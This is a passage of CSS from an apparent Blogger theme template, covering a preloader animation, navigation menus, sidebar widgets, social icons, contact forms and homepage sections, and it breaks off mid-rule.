*/ /*-- Reset CSS --*/ /* PRELOADER */ ul.no-posts { text-align: center; } html .home { overflow-x: hidden; } #google_translate_element { clear: both; } #preloader { position: fixed; z-index: 1800; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; background: #fff } .no-js #preloader, .oldie #preloader { display: none } #loader { position: relative; width: 2.5em; height: 2.5em; transform: rotate(165deg); } #loader { position: absolute; top: calc(50% - 1.25em); left: calc(50% - 1.25em); } #loader:before, #loader:after { content: ''; position: absolute; top: 50%; left: 50%; display: block; width: 0.5em; height: 0.5em; border-radius: 0.25em; transform: translate(-50%, -50%); } .post-body a:visited { color:#FF0000; } #loader:before { animation: before 2s infinite; } #loader:after { animation: after 2s infinite; } @keyframes before { 0% { width: 0.5em; box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); } 35% { width: 2.5em; box-shadow: 0 -0.5em rgba(225, 20, 98, 0.75), 0 0.5em rgba(111, 202, 220, 0.75); } 70% { width: 0.5em; box-shadow: -1em -0.5em rgba(225, 20, 98, 0.75), 1em 0.5em rgba(111, 202, 220, 0.75); } 100% { box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); } } @keyframes after { 0% { height: 0.5em; box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); } 35% { height: 2.5em; box-shadow: 0.5em 0 rgba(61, 184, 143, 0.75), -0.5em 0 rgba(233, 169, 32, 0.75); } 70% { height: 0.5em; box-shadow: 0.5em -1em rgba(61, 184, 143, 0.75), -0.5em 1em rgba(233, 169, 32, 0.75); } 100% { box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); } } a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,font,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{ padding:0; border:0; outline:0; vertical-align:baseline; background:0 0; text-decoration:none } *{ -webkit-box-sizing: border-box; box-sizing: border-box; } form,textarea,input,button{ -webkit-appearance:none; -moz-appearance:none; appearance:none; border-radius:0 } dl,ul{ list-style-position:inside; font-weight:400; list-style:none } ul li{ list-style:none } caption,th{ text-align:center } img{ border:none; position:relative } a,a:visited{ text-decoration:none } .post-body a:visited { color:red; } .clearfix{ clear:both } .section,.widget,.widget ul{ margin:0; padding:0 } a{ color:$(main.color) } a:visited { color:red; } a:hover{ color:$(title.color) } a img{ border:0 } abbr{ text-decoration:none } .CSS_LIGHTBOX{ z-index:999999!important } .separator a{ clear:none!important; float:none!important; margin-left:0!important; margin-right:0!important } #navbar-iframe,.widget-item-control,a.quickedit,.home-link,.feed-links{ display:none!important } .center{ display:table; margin:0 auto; position:relative } .widget > h2,.widget > h3{ display:none } h1,h2,h3,h4,h5,h6 {font-family: 'Nunito', sans-serif;font-weight:700;} /*-- Body Content CSS --*/ body{ background-color:#fff; font-family:'Poppins',sans-serif; font-size:14px; font-weight:400; color:$(body.text.color); word-wrap:break-word; margin:0; padding:0 } .row{ width:1140px } #content-wrapper{ float:left; width:100%; padding:0 0 35px; margin:0; background-color: #f3f7fd; } .home #content-wrapper { margin:0; padding-bottom:35px; } .item #content-wrapper{ margin:40px 0; background:#ffffff; } #content-wrapper > .container{ position:relative; margin:0 auto } #main-wrapper{ overflow:hidden; padding:0; margin:0 -7px } .index #main-wrapper { overflow: visible; float: left; width: 100%; margin: 0; } .item #main-wrapper{ margin:0; float: left; overflow: hidden; width: 66.66666667%; box-sizing: border-box; word-wrap: break-word; padding: 0 15px; margin: 0; } #sidebar-wrapper{ display:none; float: right; overflow: hidden; width: 33.33333333%; box-sizing: border-box; word-wrap: break-word; padding: 0 15px; } .item #sidebar-wrapper { display:block; } .sidebar .widget{ position:relative; overflow:hidden; background-color:#fff; box-sizing:border-box; padding:0; margin:0 0 35px } .sidebar .widget-title{ position:relative; float:left; width:100%; height:32px; background-color:#f0f0f0; display:block; margin:0 0 20px } .sidebar .widget-title > h3{ position:relative; display:block; height:32px; font-size:12px; color:#333333; font-weight:700; line-height:32px; text-align:center; text-transform:uppercase; padding:0 15px; margin:0; border-radius:2px 2px 0 0 } .sidebar .widget-content{ float:left; width:100%; margin:0 } .list-label li{ position:relative; display:block; padding:8px 0; border-top:1px dotted #eaeaea } .list-label li:first-child{ padding:0 0 8px; border-top:0 } .list-label li:last-child{ padding-bottom:0; border-bottom:0 } .list-label li a{ display:block; color:$(title.color); font-size:13px; font-weight:400; text-transform:capitalize; transition:color .17s } .list-label li a:before{ content:"\f105"; float:left; color:$(title.color); font-size:12px; font-weight:400; font-family:FontAwesome; margin:0 3px 0 0; transition:color .17s } .list-label li a:hover{ color:$(main.color) } .list-label .label-count{ position:relative; float:right; font-weight:400 } .cloud-label li{ position:relative; float:left; margin:0 5px 5px 0 } .cloud-label li a{ display:block; height:26px; background-color:#fff; color:$(title.color); font-size:12px; line-height:26px; font-weight:400; padding:0 10px; border:1px solid #eaeaea; border-radius:3px; transition:all .17s ease } .cloud-label li a:hover{ color:$(main.color) } .cloud-label .label-count{ display:none } .sidebar .FollowByEmail > .widget-title > h3{ margin:0 } .FollowByEmail .widget-content{ position:relative; overflow:hidden; background-color:$(main.color); font-weight:400; text-align:center; box-sizing:border-box; padding:20px } .FollowByEmail .widget-content > h3{ font-size:18px; color:#fff; font-weight:700; margin:0 0 13px } .FollowByEmail .before-text{ font-size:13px; color:#fff; line-height:1.4em; margin:0 0 15px; display:block; padding:0 15px; overflow:hidden } .FollowByEmail .follow-by-email-inner{ position:relative } .FollowByEmail .follow-by-email-inner .follow-by-email-address{ width:100%; height:34px; color:#888; font-size:11px; font-family:inherit; text-align:center; padding:0 10px; margin:0 0 10px; box-sizing:border-box; border:1px solid #eaeaea; transition:ease .17s } .FollowByEmail .follow-by-email-inner .follow-by-email-address:focus{ border-color:rgba(0,0,0,0.1) } .FollowByEmail .follow-by-email-inner .follow-by-email-submit{ width:100%; height:34px; font-family:inherit; font-size:11px; color:#fff; background-color:$(dark.color); text-transform:uppercase; text-align:center; font-weight:700; cursor:pointer; margin:0; border:0; transition:opacity .17s } .FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover{ opacity:.8 } #ArchiveList ul.flat li{ color:$(title.color); font-size:13px; font-weight:400; padding:8px 0; border-bottom:1px dotted #eaeaea } #ArchiveList ul.flat li:first-child{ padding-top:0 } #ArchiveList ul.flat li:last-child{ padding-bottom:0; border-bottom:0 } #ArchiveList .flat li > a{ display:block; color:$(title.color); transition:color .17s } #ArchiveList .flat li > a:hover{ color:$(main.color) } #ArchiveList .flat li > a:before{ content:"\f105"; float:left; color:$(title.color); font-size:12px; font-weight:400; font-family:FontAwesome; margin:0 3px 0 0; display:inline-block; transition:color .17s } #ArchiveList .flat li > a > span{ position:relative; float:right; font-weight:400 } .PopularPosts .post{ overflow:hidden; margin:20px 0 0 } .PopularPosts .post:first-child{ margin:0 } .PopularPosts .post-image-link{ position:relative; width:80px; height:65px; float:left; overflow:hidden; display:block; vertical-align:middle; margin:0 12px 0 0 } .PopularPosts .post-info{ overflow:hidden } .PopularPosts .post-title{ font-size:14px; font-weight:500; line-height:1.4em; margin:0 0 5px } .PopularPosts .post-title a{ display:block; color:$(title.color); transition:color .17s } .PopularPosts .post-title a:hover{ color:$(main.color) } .PopularPosts .post-meta{ font-size:11px } .PopularPosts .post-date:before{ font-size:10px } .FeaturedPost .post-image-link{ display:block; position:relative; overflow:hidden; width:100%; height:180px; margin:0 0 13px } .FeaturedPost .post-title{ font-size:18px; overflow:hidden; font-weight:500; line-height:1.4em; margin:0 0 10px } .FeaturedPost .post-title a{ color:$(title.color); display:block; transition:color .17s ease } .FeaturedPost .post-title a:hover{ color:$(main.color) } .Text{ font-size:13px } .contact-form-widget form{ font-weight:400 } .contact-form-name{ float:left; width:100%; height:30px; font-family:inherit; font-size:13px; line-height:30px; box-sizing:border-box; padding:5px 10px; margin:0 0 10px; border:1px solid #eaeaea } .contact-form-email{ float:left; width:100%; height:30px; font-family:inherit; font-size:13px; line-height:30px; box-sizing:border-box; padding:5px 10px; margin:0 0 10px; border:1px solid #eaeaea } .contact-form-email-message{ float:left; width:100%; font-family:inherit; font-size:13px; box-sizing:border-box; padding:5px 10px; margin:0 0 10px; border:1px solid #eaeaea } .contact-form-button-submit{ float:left; width:100%; height:30px; background-color:$(main.color); font-size:13px; color:#fff; line-height:30px; cursor:pointer; box-sizing:border-box; padding:0 10px; margin:0; border:0; transition:background .17s ease } .contact-form-button-submit:hover{ background-color:$(dark.color) } .contact-form-error-message-with-border{ float:left; width:100%; background-color:#fbe5e5; font-size:11px; text-align:center; line-height:11px; padding:3px 0; margin:10px 0; box-sizing:border-box; border:1px solid #fc6262 } .contact-form-success-message-with-border{ float:left; width:100%; background-color:#eaf6ff; font-size:11px; text-align:center; line-height:11px; padding:3px 0; margin:10px 0; box-sizing:border-box; border:1px solid #5ab6f9 } .contact-form-cross{ margin:0 0 0 3px } .contact-form-error-message,.contact-form-success-message{ margin:0 } .BlogSearch .search-input{ float:left; width:75%; height:30px; background-color:#fff; font-weight:400; font-size:13px; line-height:30px; box-sizing:border-box; padding:5px 10px; border:1px solid #eaeaea; border-right-width:0 } .BlogSearch .search-action{ float:right; width:25%; height:30px; font-family:inherit; font-size:13px; line-height:30px; cursor:pointer; box-sizing:border-box; background-color:$(main.color); color:#fff; padding:0 5px; border:0; transition:background .17s ease } .BlogSearch .search-action:hover{ background-color:$(dark.color) } .Profile .profile-img{ float:left; width:80px; height:80px; margin:0 15px 0 0; transition:all .17s ease } .Profile .profile-datablock{ margin:0 } .Profile .profile-data .g-profile{ display:block; font-size:14px; color:$(title.color); margin:0 0 5px; transition:color .17s ease } .Profile .profile-data .g-profile:hover{ color:$(main.color) } .Profile .profile-info > .profile-link{ color:$(title.color); font-size:11px; margin:5px 0 0; transition:color .17s ease } .Profile .profile-info > .profile-link:hover{ color:$(main.color) } .Profile .profile-datablock .profile-textblock{ display:none } .common-widget .LinkList ul li,.common-widget .PageList ul li{ width:calc(50% - 5px); padding:7px 0 0 } .common-widget .LinkList ul li:nth-child(odd),.common-widget .PageList ul li:nth-child(odd){ float:left } .common-widget .LinkList ul li:nth-child(even),.common-widget .PageList ul li:nth-child(even){ float:right } .common-widget .LinkList ul li a,.common-widget .PageList ul li a{ display:block; color:$(title.color); font-size:13px; font-weight:400; transition:color .17s ease } .common-widget .LinkList ul li a:hover,.common-widget .PageList ul li a:hover{ color:$(main.color) } .common-widget .LinkList ul li:first-child,.common-widget .LinkList ul li:nth-child(2),.common-widget .PageList ul li:first-child,.common-widget .PageList ul li:nth-child(2){ padding:0 } .post-image-wrap{ position:relative; display:block } .post-image-link:hover:after,.post-image-wrap:hover .post-image-link:after{ opacity:1 } .post-image-link,.comments .avatar-image-container{ background-color:#f9f9f9 } .post-thumb{ display:block; position:relative; width:100%; height:100%; color:transparent; object-fit:cover; z-index:1; opacity: 0; transition:opacity .35s ease,transform .35s ease } .post-thumb.lazy-yard { opacity: 1; } .widget-title > h3{ display:none } #brand-services-wrap .widget-title { display:none; } #brand-services-wrap .widget-title > h3 { display: block; font-size: 42px; color: $(dark.color); font-weight: 700; } .custom-widget li{ overflow:hidden; margin:20px 0 0 } .custom-widget li:first-child{ padding:0; margin:0; border:0 } .custom-widget .post-image-link{ position:relative; width:80px; height:60px; float:left; overflow:hidden; display:block; vertical-align:middle; margin:0 12px 0 0 } .custom-widget .post-info{ overflow:hidden } .custom-widget .post-title{ overflow:hidden; font-size:13px; font-weight:400; line-height:1.5em; margin:0 0 3px } .custom-widget .post-title a{ display:block; color:$(dark.color); transition:color .17s } .custom-widget li:hover .post-title a{ color:$(main.color) } .custom-widget .post-meta{ font-size:12px } #editorial-wrap .container { margin: 0 auto; } .editorial-authors { display: flex; flex-wrap: wrap; margin: 0 -15px 0; } .editorial-authors .widget { display: block; width: 33.33333%; padding:0 15px; box-sizing: border-box; border-radius: 12px; text-align: center; } .editorial-authors .widget .editorial-avatar-wrap { position: relative; } .editorial-authors .widget .editorial-avatar-wrap .editorial-avatar { display: block; width: 100%; height: 510px; overflow: hidden; } .editorial-authors .widget .editorial-avatar-wrap .editorial-avatar img { display: block; width: 100%; height: 100%; object-fit: cover; margin: 0; } .editorial-authors .widget .editorial-avatar-wrap .editorial-info { position: absolute; bottom: 0; left: 0; right: 0; padding: 30px 30px 34px; text-align: center; background-image: -webkit-gradient(linear,left top,left bottom,from(#000),to(transparent)); background-image: -webkit-linear-gradient(bottom,#000,transparent); background-image: -moz-linear-gradient(bottom,#000,transparent); background-image: -ms-linear-gradient(bottom,#000,transparent); background-image: -o-linear-gradient(bottom,#000,transparent); background-image: linear-gradient(bottom,#000,transparent); filter: progid:DXImageTransform.Microsoft.gradient(startColorStr='#000',endColorStr='rgba(0, 0, 0, 0)'); } .editorial-authors .widget .editorial-avatar-wrap .editorial-info .editorial-title { font-size: 22px; color: #fff; font-weight: 700; margin: 0 0 2px; } .editorial-authors .widget .editorial-avatar-wrap .editorial-info .editorial-meta { font-size: 14px; color: #fff; font-weight: 400; margin: 0; display: block; } #editorial-wrap .head-text { margin: 15px 0 50px; } #editorial-wrap { display: none; margin-bottom: 50px; } #top-bar{ background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbsuV-gOjch3xrMAWZDXn6olz2n1UctCGROPApGSAHyLOX1NuG6a2mllLGYUawAJ6Llh8QVzkbT907ZIPT_xHEWrgi-AHz0G7edpT4yX0GYeNhyphenhyphennCqwh0kfvIvqSI4UvE2lhQ5mhd7ceau/s16000/email-bg.jpg); background-size: cover; background-position: 50%; background-repeat: no-repeat; background-attachment: fixed; width:100%; padding:20px 0 0; overflow:hidden; margin:0; position:relative; } .top-bar-bg{ background-color: rgba(68,63,69,0.9); position: absolute; top: 0; left: 0; width: 100%; height: 100%; box-sizing: border-box; } #top-bar .container{ margin:0 auto } .top-bar-nav{ position:relative; float:right; display:block } .top-bar-nav .widget > .widget-title{ display:none } .top-bar-nav ul li{ float:left } .top-bar-nav ul li > a{ height:30px; display:block; color:#fff; font-size:12px; font-weight:400; line-height:30px; margin:0 0 0 10px; padding:0 5px; transition:color .17s } .top-bar-nav ul li:first-child > a{ padding:0 5px 0 0 } .top-bar-nav ul > li:hover > a{ color:$(main.color) } .top-bar-social{ float:left; width:66.66666667%; position:relative; display:block; margin: 0; padding:25px 0 0; text-align:center; } #author-email-pic { width: 33.33333333%; float: right; } #author-email-pic img { height: auto; max-width: 100%; vertical-align: top; } .top-bar-social .BlogSearch { max-width: 550px; width: 100%; margin: 0 auto; overflow:hidden; } .top-bar-social .BlogSearch .widget-content { background:transparent; } .top-bar-social .BlogSearch .search-input { border-radius: 10px; height: auto; font-size: 15px; width: 100%; color: #888; font-family: inherit; text-align: center; padding: 0; margin: 0 0 10px; box-sizing: border-box; border: 1px solid #eaeaea; transition: ease .17s; line-height: 50px; } .top-bar-social .BlogSearch .search-input input { width: 100%; box-sizing: border-box; padding: 0 10px; border: 0; text-align:center; height: 50px; border-radius: 10px; line-height: 50px; } .top-bar-social .BlogSearch .search-action { width:auto; display: inline-block; padding: 0 15px; box-sizing: border-box; border-radius: 30px; background:$(main.color); height: 45px; font-size: 14px; letter-spacing: 1px; float: none; } .top-bar-social .LinkList { margin-top:15px; } .top-bar-social .widget-title > h3 { display: block; color: #f2f2f2; font-size: 36px; line-height: 42px; font-weight: 700; margin: 0 0 15px; } .top-bar-social .LinkList > .widget-title{ display:none } .top-bar-social ul > li{ display:inline-block } .top-bar-social ul > li > a{ display:block; width:30px; height:30px; border:1px solid rgba(158, 158, 158, 0.15); color:#ffffff; font-size:14px; text-align:center; line-height:30px; padding:0; margin:0 0 0 10px; transition:all .17s ease; border-radius:50%; } .top-bar-social ul > li:hover > a{ color:$(main.color) } .social a:before{ display:inline-block; font-family:FontAwesome; font-style:normal; font-weight:400 } .social .facebook a:before{ content:"\f230" } .social .facebook-f a:before{ content:"\f09a" } .social .twitter a:before{ content:"\f099" } .social .gplus a:before{ content:"\f0d5" } .social .rss a:before{ content:"\f09e" } .social .youtube a:before{ content:"\f16a" } .social .skype a:before{ content:"\f17e" } .social .stumbleupon a:before{ content:"\f1a4" } .social .tumblr a:before{ content:"\f173" } .social .vk a:before{ content:"\f189" } .social .stack-overflow a:before{ content:"\f16c" } .social .github a:before{ content:"\f09b" } .social .linkedin a:before{ content:"\f0e1" } .social .dribbble a:before{ content:"\f17d" } .social .soundcloud a:before{ content:"\f1be" } .social .behance a:before{ content:"\f1b4" } .social .digg a:before{ content:"\f1a6" } .social .instagram a:before{ content:"\f16d" } .social .pinterest a:before{ content:"\f0d2" } .social .pinterest-p a:before{ content:"\f231" } .social .twitch a:before{ content:"\f1e8" } .social .delicious a:before{ content:"\f1a5" } .social .codepen a:before{ content:"\f1cb" } .social .reddit a:before{ content:"\f1a1" } .social .whatsapp a:before{ content:"\f232" } .social .snapchat a:before{ content:"\f2ac" } .social .email a:before{ content:"\f0e0" } .social .external-link a:before{ content:"\f14c" } .social-color .facebook a,.social-color .facebook-f a{ background-color:#3b5999 } .social-color .twitter a{ background-color:#00acee } .social-color .gplus a{ background-color:#db4a39 } .social-color .youtube a{ background-color:#db4a39 } .social-color .instagram a{ background-color:#bc3490 } .social-color .pinterest a,.social-color .pinterest-p a{ background-color:#ca2127 } .social-color .dribbble a{ background-color:#ea4c89 } .social-color .linkedin a{ background-color:#0077b5 } .social-color .tumblr a{ background-color:#365069 } .social-color .twitch a{ background-color:#6441a5 } .social-color .rss a{ background-color:#ffc200 } .social-color .skype a{ background-color:#00aff0 } .social-color .stumbleupon a{ background-color:#eb4823 } .social-color .vk a{ background-color:#4a76a8 } .social-color .stack-overflow a{ background-color:#f48024 } .social-color .github a{ background-color:#24292e } .social-color .soundcloud a{ background-color:#ff5400 } .social-color .behance a{ background-color:#191919 } .social-color .digg a{ background-color:#1b1a19 } .social-color .delicious a{ background-color:#0076e8 } .social-color .codepen a{ background-color:#000 } .social-color .reddit a{ background-color:#ff4500 } .social-color .whatsapp a{ background-color:#3fbb50 } .social-color .snapchat a{ background-color:#ffe700 } .social-color .email a{ background-color:#888 } .social-color .external-link a{ background-color:$(dark.color) } .home #header-wrap { position: absolute; background:transparent; } #header-wrap{ position: relative; left: 0; top: 0; padding: 0; width: 100%; height: 68px; z-index: 1010; } .home #header-wrap { top: 30px; } #header-wrap .container{ margin: 0 auto; position: relative; background-color: #ffffff; border-radius: 8px; box-shadow: 0 2px 40px 0 rgba(0,0,0,.08); height: 68px; padding:0 25px 0; } .header-logo{ position:relative; float:left; height:38px; margin:15px 0 0 } .header-logo .header-brand{ display:inline-block; line-height:0 } .header-logo img{ max-width:100%; height:38px; vertical-align:middle } .header-logo h1{ color:$(main.menu.color); font-size:20px; line-height:38px; margin:0 } .header-logo p{ font-size:12px; margin:5px 0 0 } #parallax-menu { display: none; } .home #parallax-menu { display: block; } .scrolling-menu { float: right; position: relative; height: 68px; } .scrolling-menu ul > li { float: left; position: relative; margin: 0; padding: 0; transition: color .17s; } .scrolling-menu ul > li > a { position: relative; color: $(main.menu.color); font-size: 12px; font-weight: 600; text-transform: uppercase; line-height: 68px; display: inline-block; text-decoration: none; padding: 0 10px; margin: 0 0 0 5px; transition: color .17s; } .home #main-menu { display:none; } #main-menu{ float:right } #main-menu .widget,#main-menu .widget > .widget-title{ display:none } #main-menu .show-menu{ display:block } #main-menu{ position:relative; height:68px; z-index:15 } #main-menu ul > li{ float:left; position:relative; margin:0; padding:0; transition:color .17s } #main-menu ul > li > a{ position:relative; color:$(main.menu.color); font-size:12px; font-weight:600; text-transform:uppercase; line-height:68px; display:inline-block; text-decoration:none; padding:0 10px; margin:0 0 0 5px; transition:color .17s } #main-menu #main-menu-nav > li:last-child > a{ padding:0 0 0 10px } #main-menu ul > li > a:hover{ color:$(main.color) } #main-menu ul > li > ul{ position:absolute; float:left; left:0; top:68px; width:180px; background-color:$(dark.color); z-index:99999; margin-top:0; padding:0; visibility:hidden; opacity:0 } #main-menu ul > li > ul > li > ul{ position:absolute; float:left; top:0; left:100%; margin-left:0 } #main-menu ul > li > ul > li{ display:block; float:none; position:relative; transition:background .17s ease } #main-menu ul > li > ul > li a{ display:block; height:34px; font-size:11px; color:#ffffff; line-height:34px; box-sizing:border-box; padding:0 15px; margin:0 } #main-menu ul > li > ul > li:hover{ background-color:$(main.color) } #main-menu ul > li > ul > li:hover > a{ color:#fff } #main-menu ul > li.has-sub > a:after{ content:'\f107'; float:right; font-family:FontAwesome; font-size:12px; font-weight:400; margin:0 0 0 6px } #main-menu ul > li > ul > li.has-sub > a:after{ content:'\f105'; float:right; margin:0 } #main-menu ul > li:hover > ul,#main-menu ul > li > ul > li:hover > ul{ visibility:visible; opacity:1 } #main-menu ul ul{ transition:all .17s ease } .mobile-menu-toggle, .scrolling-mobile-menu-toggle{ display:none; position:absolute; right:0; top:0; height:68px; line-height:68px; z-index:20; color:$(main.menu.color); font-size:21px; font-weight:400; text-align:left; cursor:pointer; padding:0 0 0 20px; transition:color .17s ease } .home .mobile-menu-toggle, .home .mobile-menu-wrap { display:none; } .mobile-menu-toggle:before, .scrolling-mobile-menu-toggle:before{ content:"\f0c9"; font-family:FontAwesome } .nav-active .mobile-menu-toggle:before, .scrolling-active .scrolling-mobile-menu-toggle:before{ content:"\f00d"; font-family:FontAwesome } .mobile-menu-toggle:hover, .scrolling-mobile-menu-toggle:hover{ color:$(main.color) } .overlay{ display:none; position:fixed; top:0; left:0; right:0; bottom:0; z-index:990; background:rgba(0,0,0,0.8) } .mobile-menu-wrap, .scrolling-mobile-menu-wrap{ display:none } .mobile-menu, .scrolling-mobile-menu{ position:absolute; top:68px; left:0; width:100%; background-color:$(dark.color); box-sizing:border-box; visibility:hidden; z-index:1000; opacity:0; border-top:1px solid rgba(255,255,255,0.05); transition:all .17s ease } .nav-active .mobile-menu, .scrolling-active .scrolling-mobile-menu{ visibility:visible; opacity:1 } .mobile-menu > ul, .scrolling-mobile-menu > ul{ margin:0 } .mobile-menu .m-sub{ display:none; padding:0 } .mobile-menu ul li, .scrolling-mobile-menu ul li{ position:relative; display:block; overflow:hidden; float:left; width:100%; font-size:11px; font-weight:600; text-transform:uppercase; line-height:38px; border-bottom:1px solid rgba(255,255,255,0.05) } .mobile-menu ul li:last-child, .scrolling-mobile-menu ul li:last-child{ border-bottom:0 } .mobile-menu > ul li ul{ overflow:hidden } .mobile-menu ul li a, .scrolling-mobile-menu ul li a{ color:#ffffff; padding:0 20px; display:block; transition:all .17s ease } .mobile-menu ul li a:hover, .scrolling-mobile-menu ul li a:hover{ color:$(main.color) } .mobile-menu ul li.has-sub .submenu-toggle{ position:absolute; top:0; right:0; color:#ffffff; cursor:pointer; border-left:1px solid rgba(255,255,255,0.05) } .mobile-menu ul li.has-sub .submenu-toggle:after{ content:'\f105'; font-family:FontAwesome; font-weight:400; float:right; width:38px; font-size:16px; line-height:38px; text-align:center; transition:all .17s ease } .mobile-menu ul li.has-sub .submenu-toggle:hover{ color:$(main.color) } .mobile-menu ul li.has-sub.show > .submenu-toggle:after{ transform:rotate(90deg) } .mobile-menu ul li ul li:first-child{ border-top:1px solid rgba(255,255,255,0.05) } .mobile-menu ul li ul li{ background-color:rgba(255,255,255,0.05) } #intro-wrap{ display:none; position:relative; float:left; width:100%; z-index:2; margin:0; background:#ffffff; } .slide-in { font-size: 3.3rem; position: absolute; bottom: 2.2rem; left: 0; display: block; width: 100%; margin: 0; padding: 0 } .slide-in .pointer { position: absolute; top: 50%; left: 50%; width: 26px; height: 42px; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%); border: 2px solid $(main.color); border-radius: 26px; -webkit-backface-visibility: hidden } .slide-in .pointer:after { position: absolute; top: 5px; left: 50%; width: 4px; height: 4px; margin-left: -2px; content: ''; -webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0); transform: translateY(0) scaleY(1) scaleX(1) translateZ(0); -webkit-animation: scroll 1.5s -1s cubic-bezier(.68, -.55, .265, 1.55) infinite; animation: scroll 1.5s -1s cubic-bezier(.68, -.55, .265, 1.55) infinite; opacity: 1; border-radius: 100%; background-color: $(main.color) } @-webkit-keyframes scroll { 0%, 20% { -webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0); transform: translateY(0) scaleY(1) scaleX(1) translateZ(0) } 10% { -webkit-transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0); transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0); opacity: 1 } to { -webkit-transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0); transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0); opacity: .01 } } @keyframes scroll { 0%, 20% { -webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0); transform: translateY(0) scaleY(1) scaleX(1) translateZ(0) } 10% { -webkit-transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0); transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0); opacity: 1 } to { -webkit-transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0); transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0); opacity: .01 } } @-webkit-keyframes blink { 0%, to { opacity: 1 } 50% { opacity: 0 } } @keyframes blink { 0%, to { opacity: 1 } 50% { opacity: 0 } } #main-intro{ position:relative; float:left; width:100%; height:100%; } #main-intro .widget{ height:100%; width:100%; display:block; overflow:hidden } #main-intro .widget-content { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin:0 -15px; align-items: center; } #main-intro .container { position: relative; margin: 0 auto; } #main-intro .widget.HTML, #main-intro #HTML100 { display: none; } .intro-content{ display: flex; flex-direction: column; max-width: 50%; flex: 0 0 50%; text-align: left; margin: 0; padding:0 15px; } .intro-title{ font-size:50px; color:$(intro.title); font-weight:900; margin:0 0 20px } .intro-snippet{ font-size:18px; line-height:34px; color:$(intro.text); margin:0 } .intro-action a, .service-action a{ position:relative; display:inline-block; height:40px; font-size:14px; overflow: hidden; z-index: 1; color:#fff; line-height:40px; padding:0 25px; margin:30px 0 0;-webkit-border-radius: 40px; -moz-border-radius: 40px; border-radius: 40px; transition:background .17s ease } .intro-action a:after, .service-action a:after { position: absolute; left: 0; top: 0; content: ""; height: 100%; width: 100%; background: #f9c747 none repeat scroll 0 0; transition: all .35s ease-in-out; z-index: -1; } .intro-action a:hover{ background-color:$(dark.color) } .intro-image { display: flex; flex-direction: column; max-width: 50%; flex: 0 0 50%; text-align: left; margin: 0; order: 13; padding:0 15px; } .author-intro-widgets-duo { box-shadow: 0 0 0 0 #ffffff; background: #14212a; padding: 40px 0; } .author-intro-widgets-duo .container { margin: 0 auto; display: grid; grid-template-columns: 1fr; grid-gap: 0; } .author-intro-widgets-duo .widget { display: block; overflow: hidden; padding: 55px 55px 55px 0; border-bottom: 2px solid rgba(255,255,255,.15); } .author-intro-widgets-duo .author-list.right-side-widget .widget:last-child { border-width:0; } .author-intro-widgets-duo .author-list .service-icon { float:left; margin-right: 25px; font-size: 45px; color: $(main.color); position: relative; background: #011D3A; border-radius: 16px; box-shadow: 0px 16px 24px 4px rgb(1 21 41 / 20%); height: 130px; width: 130px; flex-shrink: 0; text-align: center; line-height: 130px; } .author-intro-widgets-duo .author-list .service-content { text-align: left; } .author-intro-widgets-duo .author-list .service-title { color:#FEFFFE; font-size: 35px; margin: 0 0 15px; } .author-intro-widgets-duo .author-list .service-snippet { font-size: 16px; font-weight: 400; line-height: 1.875; color: #99A2AC; margin: 0; } #brand-services-wrap{ display:none; float:left; width:100%; padding:30px 0 } #brand-services-wrap .container { position: relative; margin: 0 auto; } #brand-services-wrap ul { padding:0; margin:0; list-style:none; } #brand-services-wrap li{ float: left; width: calc(100% / 5); box-sizing: border-box; padding: 0 20px; position:relative; text-align:center; } .counter-box { overflow: hidden; margin: 0 auto; padding: 60px 0; position: relative; } .counter-box .container { margin:0 auto; } #counter-box-bg .container { background-color: #ffdc39; border-radius: 8px; position:relative; overflow: hidden; } #counter-box-bg .container:before { content: ""; position: absolute; left: -100px; top: -100px; width: 260px; height: 260px; background-color: rgb(255 238 140 / .5); border-radius: 215px 45px; } #counter-box-bg .container:after { content: ""; position: absolute; right: -110px; bottom: -99px; width: 245px; height: 245px; border-radius: 200px 45px; background-color: rgb(255 238 140 / .5); } .counter-box-info { float: right; width: 50%; padding-left:30px; box-sizing: border-box; } .counter-box-info .head-text { text-align: left; margin: 0 0 30px; } .counter-box-image { float: left; width: 50%; padding-right:30px; box-sizing: border-box; } .counter-box-wrap { float:left; width:100%; position:relative; display: grid; grid-template-columns: repeat(4,1fr); grid-gap: 20px; margin: 0 auto; } .counter-box-wrap .widget { display: flex; flex-direction: column; width: 100%; padding:75px 0; box-sizing: border-box; color: #fefefe; position: relative; flex-wrap: wrap; align-content: center; } .counter-avatar { float: left; margin-right: 15px; position: relative; height: 45px; width: 45px; flex-shrink: 0; text-align: center; line-height: 45px; } .counter-avatar img { width: 100%; height: 100%; } .counter-avatar i { display: block; line-height: 45px; font-size: 45px; font-weight: 400; font-style: normal; margin: 0; color: #1b2024; } .counter-info { overflow: hidden; } .counter-info .counter-title { font-size: 30px; line-height: .9; font-weight: 700; margin: 0; color:#1b2024; padding: 0; } .counter-info .counter-meta { font-weight: 400; font-size: 12px; color: #1b2024; margin: 0; } .counter-box-image .counter-content { position: 